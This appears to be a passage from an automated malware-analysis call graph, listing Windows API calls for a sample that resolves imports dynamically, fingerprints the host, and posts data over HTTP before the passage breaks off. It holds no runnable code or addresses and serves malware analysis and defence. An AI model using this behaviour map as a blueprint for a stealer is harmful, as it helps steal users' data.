2 API calls 14162->14163 14164 d3447d 14163->14164 14165 d345c0 2 API calls 14164->14165 14166 d34496 14165->14166 14167 d345c0 2 API calls 14166->14167 14168 d344af 14167->14168 14169 d345c0 2 API calls 14168->14169 14170 d344c8 14169->14170 14171 d345c0 2 API calls 14170->14171 14172 d344e1 14171->14172 14173 d345c0 2 API calls 14172->14173 14174 d344fa 14173->14174 14175 d345c0 2 API calls 14174->14175 14176 d34513 14175->14176 14177 d345c0 2 API calls 14176->14177 14178 d3452c 14177->14178 14179 d345c0 2 API calls 14178->14179 14180 d34545 14179->14180 14181 d345c0 2 API calls 14180->14181 14182 d3455e 14181->14182 14183 d345c0 2 API calls 14182->14183 14184 d34577 14183->14184 14185 d345c0 2 API calls 14184->14185 14186 d34590 14185->14186 14187 d345c0 2 API calls 14186->14187 14188 d345a9 14187->14188 14189 d49c10 14188->14189 14190 d4a036 8 API calls 14189->14190 14191 d49c20 43 API calls 14189->14191 14192 d4a146 14190->14192 14193 d4a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14190->14193 14191->14190 14194 d4a216 14192->14194 14195 d4a153 8 API calls 14192->14195 14193->14192 14196 d4a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14194->14196 14197 d4a298 14194->14197 14195->14194 14196->14197 14198 d4a2a5 6 API calls 14197->14198 14199 d4a337 14197->14199 14198->14199 14200 d4a344 9 API calls 14199->14200 14201 d4a41f 14199->14201 14200->14201 14202 d4a4a2 14201->14202 14203 d4a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14201->14203 14204 d4a4dc 14202->14204 14205 d4a4ab GetProcAddress GetProcAddress 14202->14205 14203->14202 14206 d4a515 14204->14206 14207 d4a4e5 GetProcAddress GetProcAddress 14204->14207 14205->14204 14208 d4a612 14206->14208 14209 d4a522 10 API calls 14206->14209 14207->14206 14210 d4a67d 14208->14210 14211 d4a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14208->14211 14209->14208 14212 d4a686 GetProcAddress 14210->14212 14213 d4a69e 14210->14213 14211->14210 14212->14213 14214 d4a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14213->14214 14215 d45ca3 14213->14215 14214->14215 14216 d31590 14215->14216 15335 d31670 14216->15335 14219 d4a7a0 lstrcpy 14220 d315b5 14219->14220 14221 d4a7a0 lstrcpy 14220->14221 14222 d315c7 14221->14222 14223 d4a7a0 lstrcpy 14222->14223 14224 d315d9 14223->14224 14225 d4a7a0 lstrcpy 14224->14225 14226 d31663 14225->14226 14227 d45510 14226->14227 14228 d45521 14227->14228 14229 d4a820 2 API calls 14228->14229 14230 d4552e 14229->14230 14231 d4a820 2 API calls 14230->14231 14232 d4553b 14231->14232 14233 d4a820 2 API calls 14232->14233 14234 d45548 14233->14234 14235 d4a740 lstrcpy 14234->14235 14236 d45555 14235->14236 14237 d4a740 lstrcpy 14236->14237 14238 d45562 14237->14238 14239 d4a740 lstrcpy 14238->14239 14240 d4556f 14239->14240 14241 d4a740 lstrcpy 14240->14241 14281 d4557c 14241->14281 14242 d4a740 lstrcpy 14242->14281 14243 d45643 StrCmpCA 14243->14281 14244 d456a0 StrCmpCA 14245 d457dc 14244->14245 14244->14281 14246 d4a8a0 lstrcpy 14245->14246 14247 d457e8 14246->14247 14248 d4a820 2 API calls 14247->14248 14250 d457f6 14248->14250 14249 d4a820 lstrlen lstrcpy 14249->14281 14252 d4a820 2 API calls 14250->14252 14251 d45856 StrCmpCA 14253 d45991 14251->14253 14251->14281 14255 d45805 14252->14255 14254 d4a8a0 lstrcpy 14253->14254 14256 d4599d 14254->14256 14257 d31670 lstrcpy 14255->14257 14258 d4a820 2 API calls 14256->14258 14278 d45811 14257->14278 14259 d459ab 14258->14259 14262 d4a820 2 API calls 14259->14262 14260 d45a0b StrCmpCA 14263 d45a16 Sleep 14260->14263 14264 d45a28 14260->14264 14261 d452c0 25 API calls 14261->14281 14265 d459ba 14262->14265 14263->14281 14266 d4a8a0 lstrcpy 14264->14266 14267 d31670 lstrcpy 14265->14267 14268 d45a34 14266->14268 14267->14278 14269 d4a820 2 API calls 14268->14269 14271 d45a43 14269->14271 14270 d451f0 20 API calls 14270->14281 14272 d4a820 2 API calls 14271->14272 14273 d45a52 14272->14273 14276 d31670 lstrcpy 14273->14276 14274 d4a8a0 lstrcpy 14274->14281 14275 d4578a StrCmpCA 14275->14281 14276->14278 14277 d4a7a0 lstrcpy 14277->14281 14278->13334 14279 d4593f StrCmpCA 14279->14281 14280 d31590 lstrcpy 14280->14281 14281->14242 14281->14243 14281->14244 14281->14249 14281->14251 14281->14260 14281->14261 14281->14270 14281->14274 14281->14275 14281->14277 14281->14279 14281->14280 14283 d47553 GetVolumeInformationA 14282->14283 14284 d4754c 14282->14284 14285 d47591 14283->14285 14284->14283 14286 d475fc GetProcessHeap RtlAllocateHeap 14285->14286 14287 d47628 wsprintfA 14286->14287 14288 d47619 14286->14288 14290 d4a740 lstrcpy 14287->14290 14289 d4a740 lstrcpy 14288->14289 14291 d45da7 14289->14291 14290->14291 14291->13355 14293 d4a7a0 lstrcpy 14292->14293 14294 d34899 14293->14294 15344 d347b0 14294->15344 14296 d348a5 14297 d4a740 lstrcpy 14296->14297 14298 d348d7 14297->14298 14299 d4a740 lstrcpy 14298->14299 14300 d348e4 14299->14300 14301 d4a740 lstrcpy 14300->14301 14302 d348f1 14301->14302 14303 d4a740 lstrcpy 14302->14303 14304 d348fe 14303->14304 14305 d4a740 lstrcpy 14304->14305 14306 d3490b InternetOpenA StrCmpCA 14305->14306 14307 d34944 14306->14307 14308 d34ecb InternetCloseHandle 14307->14308 15350 d48b60 14307->15350 14310 d34ee8 14308->14310 15365 d39ac0 CryptStringToBinaryA 14310->15365 14311 d34963 15358 d4a920 14311->15358 14314 d34976 14316 d4a8a0 lstrcpy 14314->14316 14321 d3497f 14316->14321 14317 d4a820 2 API calls 14318 d34f05 14317->14318 14320 d4a9b0 4 API calls 14318->14320 14319 d34f27 ctype 14323 d4a7a0 lstrcpy 14319->14323 14322 d34f1b 14320->14322 14325 d4a9b0 4 API calls 14321->14325 14324 d4a8a0 lstrcpy 14322->14324 14336 d34f57 14323->14336 14324->14319 14326 d349a9 14325->14326 14327 d4a8a0 lstrcpy 14326->14327 14328 d349b2 14327->14328 14329 d4a9b0 4 API calls 14328->14329 14330 d349d1 14329->14330 14331 d4a8a0 lstrcpy 14330->14331 14332 d349da 14331->14332 14333 d4a920 3 API calls 14332->14333 14334 d349f8 14333->14334 14335 d4a8a0 lstrcpy 14334->14335 14337 d34a01 14335->14337 14336->13358 14338 d4a9b0 4 API calls 14337->14338 14339 d34a20 14338->14339 14340 d4a8a0 lstrcpy 14339->14340 14341 d34a29 14340->14341 14342 d4a9b0 4 API calls 14341->14342 14343 d34a48 14342->14343 14344 d4a8a0 lstrcpy 14343->14344 14345 d34a51 14344->14345 14346 d4a9b0 4 API calls 14345->14346 14347 d34a7d 14346->14347 14348 d4a920 3 API calls 14347->14348 14349 d34a84 14348->14349 14350 d4a8a0 lstrcpy 14349->14350 14351 d34a8d 14350->14351 14352 d34aa3 InternetConnectA 14351->14352 14352->14308 14353 d34ad3 HttpOpenRequestA 14352->14353 14355 d34b28 14353->14355 14356 d34ebe InternetCloseHandle 14353->14356 14357 d4a9b0 4 API calls 14355->14357 14356->14308 14358 d34b3c 14357->14358 14359 d4a8a0 lstrcpy 14358->14359 14360 d34b45 14359->14360 14361 d4a920 3 API calls 14360->14361 14362 d34b63 14361->14362 14363 d4a8a0 lstrcpy 14362->14363 14364 d34b6c 14363->14364 14365 d4a9b0 4 API calls 14364->14365 14366 d34b8b 14365->14366 14367 d4a8a0 lstrcpy 14366->14367 14368 d34b94 14367->14368 14369 d4a9b0 4 API calls 14368->14369 14370 d34bb5 14369->14370 14371 d4a8a0 lstrcpy 14370->14371 14372 d34bbe 14371->14372 14373 d4a9b0 4 API calls 14372->14373 14374 d34bde 14373->14374 14375 d4a8a0 lstrcpy 14374->14375 14376 d34be7 14375->14376 14377 d4a9b0 4 API calls 14376->14377 14378 d34c06 14377->14378 14379 d4a8a0 lstrcpy 14378->14379 14380 d34c0f 14379->14380 14381 d4a920 3 API calls 14380->14381 14382 d34c2d 14381->14382 14383 d4a8a0 lstrcpy 14382->14383 14384 d34c36 14383->14384 14385 d4a9b0 4 API calls 14384->14385 14386 d34c55 14385->14386 14387 d4a8a0 lstrcpy 14386->14387 14388 d34c5e 14387->14388 14389 d4a9b0 4 API calls 14388->14389 14390 d34c7d 14389->14390 14391 d4a8a0 lstrcpy 14390->14391 14392 d34c86 14391->14392 14393 d4a920 3 API calls 14392->14393 14394 d34ca4 14393->14394 14395 d4a8a0 lstrcpy 14394->14395 14396 d34cad 14395->14396 14397 d4a9b0 4 API calls 14396->14397 14398 d34ccc 14397->14398 14399 d4a8a0 lstrcpy 14398->14399 14400 d34cd5 14399->14400 14401 d4a9b0 4 API calls 14400->14401 14402 d34cf6 14401->14402 14403 d4a8a0 lstrcpy 14402->14403 14404 d34cff 14403->14404 14405 d4a9b0 4 API calls 14404->14405 14406 d34d1f 14405->14406 14407 d4a8a0 lstrcpy 14406->14407 14408 d34d28 14407->14408 14409 d4a9b0 4 API calls 14408->14409 14410 d34d47 14409->14410 14411 d4a8a0 lstrcpy 14410->14411 14412 d34d50 14411->14412 14413 d4a920 3 API calls 14412->14413 14414 d34d6e 14413->14414 14415 d4a8a0 lstrcpy 14414->14415 14416 d34d77 14415->14416 14417 d4a740 lstrcpy 14416->14417 14418 d34d92 14417->14418 14419 d4a920 3 API calls 14418->14419 14420 d34db3 14419->14420 14421 d4a920 3 API calls 14420->14421 14422 d34dba 14421->14422 14423 d4a8a0 lstrcpy 14422->14423 14424 d34dc6 14423->14424 14425 d34de7 lstrlen 14424->14425 14426 d34dfa 14425->14426 14427 d34e03 lstrlen 14426->14427 15364 d4aad0 14427->15364 14429 d34e13 HttpSendRequestA 14430 d34e32 InternetReadFile 14429->14430 14431 d34e67 InternetCloseHandle 14430->14431 14436 d34e5e 14430->14436 14433 d4a800 14431->14433 14433->14356 14434 d4a9b0 4 API calls 14434->14436 14435 d4a8a0 lstrcpy 14435->14436 14436->14430 14436->14431 14436->14434 14436->14435 15371 d4aad0 14437->15371 14439 d417c4 StrCmpCA 14440 d417cf ExitProcess 14439->14440 14452 d417d7 14439->14452 14441 d419c2 14441->13360 14442 d41970 StrCmpCA 14442->14452 14443 d418f1 StrCmpCA 14443->14452 14444 d41951 StrCmpCA 14444->14452 14445 d41932 StrCmpCA 14445->14452 14446 d41913 StrCmpCA 14446->14452 14447 d4185d StrCmpCA 14447->14452 14448 d4187f StrCmpCA 14448->14452 14449 d418ad StrCmpCA 14449->14452 14450 d418cf StrCmpCA 14450->14452 14451 d4a820 lstrlen lstrcpy 14451->14452 14452->14441 14452->14442 14452->14443 14452->14444 14452->14445 14452->14446 14452->14447 14452->14448 14452->14449 14452->14450 14452->14451 14454 d4a7a0 lstrcpy 14453->14454 14455 d35979 14454->14455 14456 d347b0 2 API calls 14455->14456 14457 d35985 14456->14457 14458 d4a740 lstrcpy 14457->14458 14459 d359ba 14458->14459 14460 d4a740 lstrcpy 14459->14460 14461 d359c7 14460->14461 14462 d4a740 lstrcpy 14461->14462 14463 d359d4 14462->14463 14464 d4a740 lstrcpy 14463->14464 14465 d359e1 14464->14465 14466 d4a740 lstrcpy 14465->14466 14467 d359ee InternetOpenA StrCmpCA 14466->14467 14468 d35a1d 14467->14468 14469 d35fc3 InternetCloseHandle 14468->14469 14471 d48b60 3 API calls 14468->14471 14470 d35fe0 14469->14470 14474 d39ac0 4 API calls 14470->14474 14472 d35a3c 14471->14472 14473 d4a920 3 API calls 14472->14473 14475 d35a4f 14473->14475 14476 d35fe6 14474->14476 14477 d4a8a0 lstrcpy 14475->14477 14478 d4a820 2 API calls 14476->14478 14480 d3601f ctype 14476->14480 14482 d35a58 14477->14482 14479 d35ffd 14478->14479 14481 d4a9b0 4 API calls 14479->14481 14484 d4a7a0 lstrcpy 14480->14484 14483 d36013 14481->14483 14486 d4a9b0 4 API calls 14482->14486 14485 d4a8a0 lstrcpy 14483->14485 14494 d3604f 14484->14494 14485->14480 14487 d35a82 14486->14487 14488 d4a8a0 lstrcpy 14487->14488 14489 d35a8b 14488->14489 14490 d4a9b0 4 API calls 14489->14490 14491 d35aaa 14490->14491 14492 d4a8a0 lstrcpy 14491->14492 14493 d35ab3 14492->14493 14495 d4a920 3 API calls 14493->14495 14494->13366 14496 d35ad1 14495->14496 14497 d4a8a0 lstrcpy 14496->14497 14498 d35ada 14497->14498 14499 d4a9b0 4 API calls 14498->14499 14500 d35af9 14499->14500 14501 d4a8a0 lstrcpy 14500->14501 14502 d35b02 14501->14502 14503 d4a9b0 4 API calls 14502->14503 14504 d35b21 14503->14504 14505 d4a8a0 lstrcpy 14504->14505 14506 d35b2a 14505->14506 14507 d4a9b0 4 API calls 14506->14507 14508 d35b56 14507->14508 14509 d4a920 3 API calls 14508->14509 14510 d35b5d 14509->14510 14511 d4a8a0 lstrcpy 14510->14511 14512 d35b66 14511->14512 14513 d35b7c InternetConnectA 14512->14513 14513->14469 14514 d35bac HttpOpenRequestA 14513->14514 14516 d35fb6 InternetCloseHandle 14514->14516 14517 d35c0b 14514->14517 14516->14469 14518 d4a9b0 4 API calls 14517->14518 14519 d35c1f 14518->14519 14520 d4a8a0 lstrcpy 14519->14520 14521 d35c28 14520->14521 14522 d4a920 3 API calls 14521->14522 14523 d35c46 14522->14523 14524 d4a8a0 lstrcpy 14523->14524 14525 d35c4f 14524->14525 14526 d4a9b0 4 API calls 14525->14526 14527 d35c6e 14526->14527 14528 d4a8a0 lstrcpy 14527->14528 14529 d35c77 14528->14529 14530 d4a9b0 4 API calls 14529->14530 14531 d35c98 14530->14531 14532 d4a8a0 lstrcpy 14531->14532 14533 d35ca1 14532->14533 14534 d4a9b0 4 API calls 14533->14534 14535 d35cc1 14534->14535 14536 d4a8a0 lstrcpy 14535->14536 14537 d35cca 14536->14537 14538 d4a9b0 4 API calls 14537->14538 14539 d35ce9 14538->14539 14540 d4a8a0 lstrcpy 14539->14540 14541 d35cf2 14540->14541 14542 d4a920 3 API calls 14541->14542 14543 d35d10 14542->14543 14544 d4a8a0 lstrcpy 14543->14544 14545 d35d19 14544->14545 14546 d4a9b0 4 API calls 14545->14546 14547 d35d38 14546->14547 14548 d4a8a0 lstrcpy 14547->14548 14549 d35d41 14548->14549 14550 d4a9b0 4 API calls 14549->14550 14551 d35d60 14550->14551 14552 d4a8a0 lstrcpy 14551->14552 14553 d35d69 14552->14553 14554 d4a920 3 API calls 14553->14554 14555 d35d87 14554->14555 14556 d4a8a0 lstrcpy 14555->14556 14557 d35d90 14556->14557 14558 d4a9b0 4 API calls 14557->14558 14559 d35daf 14558->14559 14560 d4a8a0 lstrcpy 14559->14560 14561 d35db8 14560->14561 14562 d4a9b0 4 API calls 14561->14562 14563 d35dd9 14562->14563 14564 d4a8a0 lstrcpy 14563->14564 14565 d35de2 14564->14565 14566 d4a9b0 4 API calls 14565->14566 14567 d35e02 14566->14567 14568 d4a8a0 lstrcpy 14567->14568 14569 d35e0b 14568->14569 14570 d4a9b0 4 API calls 14569->14570 14571 d35e2a 14570->14571 14572 d4a8a0 lstrcpy 14571->14572 14573 d35e33 14572->14573 14574 d4a920 3 API calls 14573->14574 14575 d35e54 14574->14575 14576 d4a8a0 lstrcpy 14575->14576 14577 d35e5d 14576->14577 14578 d35e70 lstrlen 14577->14578 15372 d4aad0 14578->15372 14580 d35e81 lstrlen GetProcessHeap RtlAllocateHeap 15373 d4aad0 14580->15373 14582 d35eae lstrlen 14583 d35ebe 14582->14583 14584 d35ed7 lstrlen 14583->14584 14585 d35ee7 14584->14585 14586 d35ef0 lstrlen 14585->14586 14587 d35f03 14586->14587 14588 d35f1a lstrlen 14587->14588 15374 d4aad0 14588->15374 14590 d35f2a HttpSendRequestA 14591 d35f35 InternetReadFile 14590->14591 14592 d35f6a InternetCloseHandle 14591->14592 14596 d35f61 14591->14596 14592->14516 14594 d4a9b0 4 API calls 14594->14596 14595 d4a8a0 lstrcpy 14595->14596 14596->14591 14596->14592 14596->14594 14596->14595 14598 d41077 14597->14598 14599 d41151 14598->14599 14600 d4a820 lstrlen lstrcpy 14598->14600 14599->13368 14600->14598 14602 d40db7 14601->14602 14603 d40f17 14602->14603 14604 d40ea4 StrCmpCA 14602->14604 14605 d40e27 StrCmpCA 14602->14605 14606 d40e67 StrCmpCA 14602->14606 14607 d4a820 lstrlen lstrcpy 14602->14607 14603->13376 14604->14602 14605->14602 14606->14602 14607->14602 14609 d40f67 14608->14609 14610 d40fb2 StrCmpCA 14609->14610 14611 d41044 14609->14611 14612 d4a820 lstrlen lstrcpy 14609->14612 14610->14609 14611->13384 14612->14609 14614 d4a740 lstrcpy 14613->14614 14615 d41a26 14614->14615 14616 d4a9b0 4 API calls 14615->14616 14617 d41a37 14616->14617 14618 d4a8a0 lstrcpy 14617->14618 14619 d41a40 14618->14619 14620 d4a9b0 4 API calls 14619->14620 14621 d41a5b 14620->14621 14622 d4a8a0 lstrcpy 14621->14622 14623 d41a64 14622->14623 14624 d4a9b0 4 API calls 14623->14624 14625 d41a7d 14624->14625 14626 d4a8a0 lstrcpy 14625->14626 14627 d41a86 14626->14627 14628 d4a9b0 4 API calls 14627->14628 14629 d41aa1 14628->14629 14630 d4a8a0 lstrcpy 14629->14630 14631 d41aaa 14630->14631 14632 d4a9b0 4 API calls 14631->14632 14633 d41ac3 14632->14633 14634 d4a8a0 lstrcpy 14633->14634 14635 d41acc 14634->14635 14636 d4a9b0 4 API calls 14635->14636 14637 d41ae7 14636->14637 14638 d4a8a0 lstrcpy 14637->14638 14639 d41af0 14638->14639 14640 d4a9b0 4 API calls 14639->14640 14641 d41b09 14640->14641 14642 d4a8a0 lstrcpy 14641->14642 14643 d41b12 14642->14643 14644 d4a9b0 4 API calls 14643->14644 14645 d41b2d 14644->14645 14646 d4a8a0 lstrcpy 14645->14646 14647 d41b36 14646->14647 14648 d4a9b0 4 API calls 14647->14648 14649 d41b4f 14648->14649 14650 d4a8a0 lstrcpy 14649->14650 14651 d41b58 14650->14651 14652 d4a9b0 4 API calls 14651->14652 14653 d41b76 14652->14653 14654 d4a8a0 lstrcpy 14653->14654 14655 d41b7f 14654->14655 14656 d47500 6 API calls 14655->14656 14657 d41b96 14656->14657 14658 d4a920 3 API calls 14657->14658 14659 d41ba9 14658->14659 14660 d4a8a0 lstrcpy 14659->14660 14661 d41bb2 14660->14661 14662 d4a9b0 4 API calls 14661->14662 14663 d41bdc 14662->14663 14664 d4a8a0 lstrcpy 14663->14664 14665 d41be5 14664->14665 14666 d4a9b0 4 API calls 14665->14666 14667 d41c05 14666->14667 14668 d4a8a0 lstrcpy 14667->14668 14669 d41c0e 14668->14669 15375 d47690 GetProcessHeap RtlAllocateHeap 14669->15375 14672 d4a9b0 4 API calls 14673 d41c2e 14672->14673 14674 d4a8a0 lstrcpy 14673->14674 14675 d41c37 14674->14675 14676 d4a9b0 4 API calls 14675->14676 14677 d41c56 14676->14677 14678 d4a8a0 lstrcpy 14677->14678 14679 d41c5f 14678->14679 14680 d4a9b0 4 API calls 14679->14680 14681 d41c80 14680->14681 14682 d4a8a0 lstrcpy 14681->14682 14683 d41c89 14682->14683 15382 d477c0 GetCurrentProcess IsWow64Process 14683->15382 14686 d4a9b0 4 API calls 14687 d41ca9 14686->14687 14688 d4a8a0 lstrcpy 14687->14688 14689 d41cb2 14688->14689 14690 d4a9b0 4 API calls 14689->14690 14691 d41cd1 14690->14691 14692 d4a8a0 lstrcpy 14691->14692 14693 d41cda 14692->14693 14694 d4a9b0 4 API calls 14693->14694 14695 d41cfb 14694->14695 14696 d4a8a0 lstrcpy 14695->14696 14697 d41d04 14696->14697 14698 d47850 3 API calls 14697->14698 14699 d41d14 14698->14699 14700 d4a9b0 4 API calls 14699->14700 14701 d41d24 14700->14701 14702 d4a8a0 lstrcpy 14701->14702 14703 d41d2d 14702->14703 14704 d4a9b0 4 API calls 14703->14704 14705 d41d4c 14704->14705 14706 d4a8a0 lstrcpy 14705->14706 14707 d41d55 14706->14707 14708 d4a9b0 4 API calls 14707->14708 14709 d41d75 14708->14709 14710 d4a8a0 lstrcpy 14709->14710 14711 d41d7e 14710->14711 14712 d478e0 3 API calls 14711->14712 14713 d41d8e 14712->14713 14714 d4a9b0 4 API calls 14713->14714 14715 d41d9e 14714->14715 14716 d4a8a0 lstrcpy 14715->14716 14717 d41da7 14716->14717 14718 d4a9b0 4 API calls 14717->14718 14719 d41dc6 14718->14719 14720 d4a8a0 lstrcpy 14719->14720 14721 d41dcf 14720->14721 14722 d4a9b0 4 API calls 14721->14722 14723 d41df0 14722->14723 14724 d4a8a0 lstrcpy 14723->14724 14725 d41df9 14724->14725 15384 d47980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 14725->15384 14728 d4a9b0 4 API calls 14729 d41e19 14728->14729 14730 d4a8a0 lstrcpy 14729->14730 14731 d41e22 14730->14731 14732 d4a9b0 4 API calls 14731->14732 14733 d41e41 14732->14733 14734 d4a8a0 lstrcpy 14733->14734 14735 d41e4a 14734->14735 14736 d4a9b0 4 API calls 14735->14736 14737 d41e6b 14736->14737 14738 d4a8a0 lstrcpy 14737->14738 14739 d41e74 14738->14739 15386 d47a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 14739->15386 14742 d4a9b0 4 API calls 14743 d41e94 14742->14743 14744 d4a8a0 lstrcpy 14743->14744 14745 d41e9d 14744->14745 14746 d4a9b0 4 API calls 14745->14746 14747 d41ebc 14746->14747 14748 d4a8a0 lstrcpy 14747->14748 14749 d41ec5 14748->14749 14750 d4a9b0 4 API calls 14749->14750 14751 d41ee5 14750->14751 14752 d4a8a0 lstrcpy 14751->14752 14753 d41eee 14752->14753 15389 d47b00 GetUserDefaultLocaleName 14753->15389 14756 d4a9b0 4 API calls 14757 d41f0e 14756->14757 14758 d4a8a0 lstrcpy 14757->14758 14759 d41f17 14758->14759 14760 d4a9b0 4 API calls 14759->14760 14761 d41f36 14760->14761 14762 d4a8a0 lstrcpy 14761->14762 14763 d41f3f 14762->14763 14764 d4a9b0 4 API calls 14763->14764 14765 d41f60 14764->14765 14766 d4a8a0 lstrcpy 14765->14766 14767 d41f69 14766->14767 15393 d47b90 14767->15393 14769 d41f80 14770 d4a920 3 API calls 14769->14770 14771 d41f93 14770->14771 14772 d4a8a0 lstrcpy 14771->14772 14773 d41f9c 14772->14773 14774 d4a9b0 4 API calls 14773->14774 14775 d41fc6 14774->14775 14776 d4a8a0 lstrcpy 14775->14776 14777 d41fcf 14776->14777 14778 d4a9b0 4 API calls 14777->14778 14779 d41fef 14778->14779 14780 d4a8a0 lstrcpy 14779->14780 14781 d41ff8 14780->14781 15405 d47d80 GetSystemPowerStatus 14781->15405 14784 d4a9b0 4 API calls 14785 d42018 14784->14785 14786 d4a8a0 lstrcpy 14785->14786 14787 d42021 14786->14787 14788 d4a9b0 4 API calls 14787->14788 14789 d42040 14788->14789 14790 d4a8a0 lstrcpy 14789->14790 14791 d42049 14790->14791 14792 d4a9b0 4 API calls 14791->14792 14793 d4206a 14792->14793 14794 d4a8a0 lstrcpy 14793->14794 14795 d42073 14794->14795 14796 d4207e GetCurrentProcessId 14795->14796 15407 d49470 OpenProcess 14796->15407 14799 d4a920 3 API calls 14800 d420a4 14799->14800 14801 d4a8a0 lstrcpy 14800->14801 14802 d420ad 14801->14802 14803 d4a9b0 4 API calls 14802->14803 14804 d420d7 14803->14804 14805 d4a8a0 lstrcpy 14804->14805 14806 d420e0 14805->14806 14807 d4a9b0 4 API calls 14806->14807 14808 d42100 14807->14808 14809 d4a8a0 lstrcpy 14808->14809 14810 d42109 14809->14810 15412 d47e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 14810->15412 14813 d4a9b0 4 API calls 14814 d42129 14813->14814 14815 d4a8a0 lstrcpy 14814->14815 14816 d42132 14815->14816 14817 d4a9b0 4 API calls 14816->14817 14818 d42151 14817->14818 14819 d4a8a0 lstrcpy 14818->14819 14820 d4215a 14819->14820 14821 d4a9b0 4 API calls 14820->14821 14822 d4217b 14821->14822 14823 d4a8a0 lstrcpy 14822->14823 14824 d42184 14823->14824 15416 d47f60 14824->15416 14827 d4a9b0 4 API calls 14828 d421a4 14827->14828 14829 d4a8a0 lstrcpy 14828->14829 14830 d421ad 14829->14830 14831 d4a9b0 4 API calls 14830->14831 14832 d421cc 14831->14832 14833 d4a8a0 lstrcpy 14832->14833 14834 d421d5 14833->14834 14835 d4a9b0 4 API calls 14834->14835 14836 d421f6 14835->14836 14837 d4a8a0 lstrcpy 14836->14837 14838 d421ff 14837->14838 15429 d47ed0 GetSystemInfo wsprintfA 14838->15429 14841 d4a9b0 4 API calls 14842 d4221f 14841->14842 14843 d4a8a0 lstrcpy 14842->14843 14844 d42228 14843->14844 14845 d4a9b0 4 API calls 14844->14845 14846 d42247 14845->14846 14847 d4a8a0 lstrcpy 14846->14847 14848 d42250 14847->14848 14849 d4a9b0 4 API calls 14848->14849 14850 d42270 14849->14850 14851 d4a8a0 lstrcpy 14850->14851 14852 d42279 14851->14852 15431 d48100 GetProcessHeap RtlAllocateHeap 14852->15431 14855 d4a9b0 4 API calls 14856 d42299 14855->14856 14857 d4a8a0 lstrcpy 14856->14857 14858 d422a2 14857->14858 14859 d4a9b0 4 API calls 14858->14859 14860 d422c1 14859->14860 14861 d4a8a0 lstrcpy 14860->14861 14862 d422ca 14861->14862 14863 d4a9b0 4 API calls 14862->14863 14864 d422eb 14863->14864 14865 d4a8a0 lstrcpy 14864->14865 14866 d422f4 14865->14866 15437 d487c0 14866->15437 14869 d4a920 3 API calls 14870 d4231e 14869->14870 14871 d4a8a0 lstrcpy 14870->14871 14872 d42327 14871->14872 14873 d4a9b0 4 API calls 14872->14873 14874 d42351 14873->14874 14875 d4a8a0 lstrcpy 14874->14875 14876 d4235a 14875->14876 14877 d4a9b0 4 API calls 14876->14877 14878 d4237a 14877->14878 14879 d4a8a0 lstrcpy 14878->14879 14880 d42383 14879->14880 14881 d4a9b0 4 API calls 14880->14881 14882 d423a2 14881->14882 14883 d4a8a0 lstrcpy 14882->14883 14884 d423ab 14883->14884 15442 d481f0 14884->15442 14886 d423c2 14887 d4a920 3 API calls 14886->14887 14888 d423d5 14887->14888 14889 d4a8a0 lstrcpy 14888->14889 14890 d423de 14889->14890 14891 d4a9b0 4 API calls 14890->14891 14892 d4240a 14891->14892 14893 d4a8a0 lstrcpy 14892->14893 14894 d42413 14893->14894 14895 d4a9b0 4 API calls 14894->14895 14896 d42432 14895->14896 14897 d4a8a0 lstrcpy 14896->14897 14898 d4243b 14897->14898 14899 d4a9b0 4 API calls 14898->14899 14900 d4245c 14899->14900 14901 d4a8a0 lstrcpy 14900->14901 14902 d42465 14901->14902 14903 d4a9b0 4 API calls 14902->14903 14904 d42484 14903->14904 14905 d4a8a0 lstrcpy 14904->14905 14906 d4248d 14905->14906 14907 d4a9b0 4 API calls 14906->14907 14908 d424ae 14907->14908 14909 d4a8a0 lstrcpy 14908->14909 14910 d424b7 14909->14910 15450 d48320 14910->15450 14912 d424d3 14913 d4a920 3 API calls 14912->14913 14914 d424e6 14913->14914 14915 d4a8a0 lstrcpy 14914->14915 14916 d424ef 14915->14916 14917 d4a9b0 4 API calls 14916->14917 14918 d42519 14917->14918 14919 d4a8a0 lstrcpy 14918->14919 14920 d42522 14919->14920 14921 d4a9b0 4 API calls 14920->14921 14922 d42543 14921->14922 14923 d4a8a0 lstrcpy 14922->14923 14924 d4254c 14923->14924 14925 d48320 17 API calls 14924->14925 14926 d42568 14925->14926 14927 d4a920 3 API calls 14926->14927 14928 d4257b 14927->14928 14929 d4a8a0 lstrcpy 14928->14929 14930 d42584 14929->14930 14931 d4a9b0 4 API calls 14930->14931 14932 d425ae 14931->14932 14933 d4a8a0 lstrcpy 14932->14933 14934 d425b7 14933->14934 14935 d4a9b0 4 API calls 14934->14935 14936 d425d6 14935->14936 14937 d4a8a0 lstrcpy 14936->14937 14938 d425df 14937->14938 14939 d4a9b0 4 API calls 14938->14939 14940 d42600 14939->14940 14941 d4a8a0 lstrcpy 14940->14941 14942 d42609 14941->14942 15486 d48680 14942->15486 14944 d42620 14945 d4a920 3 API calls 14944->14945 14946 d42633 14945->14946 14947 d4a8a0 lstrcpy 14946->14947 14948 d4263c 14947->14948 14949 d4265a lstrlen 14948->14949 14950 d4266a 14949->14950 14951 d4a740 lstrcpy 14950->14951 14952 d4267c 14951->14952 14953 d31590 lstrcpy 14952->14953 14954 d4268d 14953->14954 15496 d45190 14954->15496 14956 d42699 14956->13388 15684 d4aad0 14957->15684 14959 d35009 InternetOpenUrlA 14960 d35021 14959->14960 14961 d350a0 InternetCloseHandle InternetCloseHandle 14960->14961 14962 d3502a InternetReadFile 14960->14962 14963 d350ec 14961->14963 14962->14960 14963->13392 15685 d398d0 14964->15685 14966 d40759 14967 d4077d 14966->14967 14968 d40a38 14966->14968 14971 d40799 StrCmpCA 14967->14971 14969 d31590 lstrcpy 14968->14969 14970 d40a49 14969->14970 15861 d40250 14970->15861 14973 d407a8 14971->14973 15000 d40843 14971->15000 14974 d4a7a0 lstrcpy 14973->14974 14976 d407c3 14974->14976 14975 d40865 StrCmpCA 14978 d40874 14975->14978 15016 d4096b 14975->15016 14977 d31590 lstrcpy 14976->14977 14980 d4080c 14977->14980 14981 d4a740 lstrcpy 14978->14981 14982 d4a7a0 lstrcpy 14980->14982 14984 d40881 14981->14984 14985 d40823 14982->14985 14983 d4099c StrCmpCA 14986 